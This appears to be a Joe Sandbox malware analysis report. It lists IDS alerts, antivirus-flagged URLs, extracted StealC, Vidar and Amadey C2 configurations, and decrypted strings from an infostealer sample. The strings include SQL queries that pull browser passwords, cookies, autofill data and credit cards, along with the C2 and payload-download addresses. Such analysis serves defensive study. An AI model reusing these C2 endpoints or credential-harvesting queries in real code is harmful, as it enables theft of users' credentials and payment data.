Classtype:	Malware Command and Control Activity Detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 185.215.113.16 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:10:05.806428+0200
SID:	2009080
Source Port:	80
Destination Port:	49726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:01.592448+0200
SID:	2044243
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:12.364155+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-07-26T20:10:10.575393+0200
SID:	2044696
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:11.027673+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:11.221575+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:11.911739+0200
SID:	2009080
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-07-26T20:10:04.271009+0200
SID:	2856147
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:10:40.334860+0200
SID:	2044243
Source Port:	64119
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:01.815034+0200
SID:	2044245
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET ACTIVEX COM Object Instantiation Memory Corruption Vulnerability MS05-054 - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:11.403569+0200
SID:	2002725
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass - Source IP: 34.104.35.123 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:11:10.890598+0200
SID:	2800029
Source Port:	80
Destination Port:	64043
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:18.087880+0200
SID:	2022930
Source Port:	443
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:04.411058+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:04.672505+0200
SID:	2009080
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:13.671490+0200
SID:	2009080
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:11.629575+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T20:10:08.647743+0200
SID:	2803305
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-07-26T20:10:07.729391+0200
SID:	2044696
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php5=	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/ferences.SourceAumide	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpk=U	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/freebl3.dllm$	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/cost/random.exe	Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllA	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpr(	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/stealc/random.exe395d7f	Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/cost/random.exe7	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/002	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpx=$	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php003002	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "85.28.47.31/5499d72b3a3e55be.php"}
Source: 44.2.48f0ec6733.exe.400000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: explorti.exe.7656.19.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\1000003002\ee7a49fbf0.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: 22
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: 08
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: 20
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: 24
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: OpenEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Sleep
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VirtualFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VirtualAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: user32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ntdll.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sscanf
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VMwareVMware
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DISPLAY
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: http://85.28.47.31
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: silence
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: /5499d72b3a3e55be.php
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: /8405906461a5200c/
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sila
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalLock
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HeapFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Process32Next
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Process32First
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: LocalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FindClose
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: WriteFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetLastError
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: TerminateProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: psapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: rstrtmgr.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SelectObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BitBlt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CoUninitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CoInitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CoCreateInstance
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptDecrypt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: wsprintfW
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegEnumValueA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetOpenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: StrStrA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: StrCmpCW
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: PathMatchSpecA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RmStartSession
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RmRegisterResources
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RmGetList
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RmEndSession
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3_open
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3_step
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3_column_text
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3_finalize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3_close
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3_column_blob
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: encrypted_key
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: PATH
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: NSS_Init
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: NSS_Shutdown
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: PK11_FreeSlot
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: PK11_Authenticate
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: C:\ProgramData\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: browser:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: profile:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: url:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: login:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: password:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Opera
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: OperaGX
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Network
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: cookies
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: .txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: TRUE
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FALSE
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: autofill
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: history
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: cc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: name:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: month:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: year:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: card:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Cookies
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Login Data
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Web Data
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: History
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: logins.json
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: formSubmitURL
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: usernameField
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: encryptedUsername
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: encryptedPassword
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: guid
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: cookies.sqlite
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: formhistory.sqlite
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: places.sqlite
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: plugins
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Local Extension Settings
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Sync Extension Settings
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: IndexedDB
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Opera Stable
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Opera GX Stable
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CURRENT
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: chrome-extension_
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Local State
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: chrome
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: opera
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: firefox
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: wallets
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ProductName
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: x32
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: x64
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ProcessorNameString
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DisplayName
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DisplayVersion
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Network Info:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - IP: IP?
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Country: ISO?
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: System Summary:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - HWID:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - OS:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Architecture:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - UserName:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Computer Name:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Local Time:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - UTC:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Language:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Keyboards:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Laptop:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Running Path:
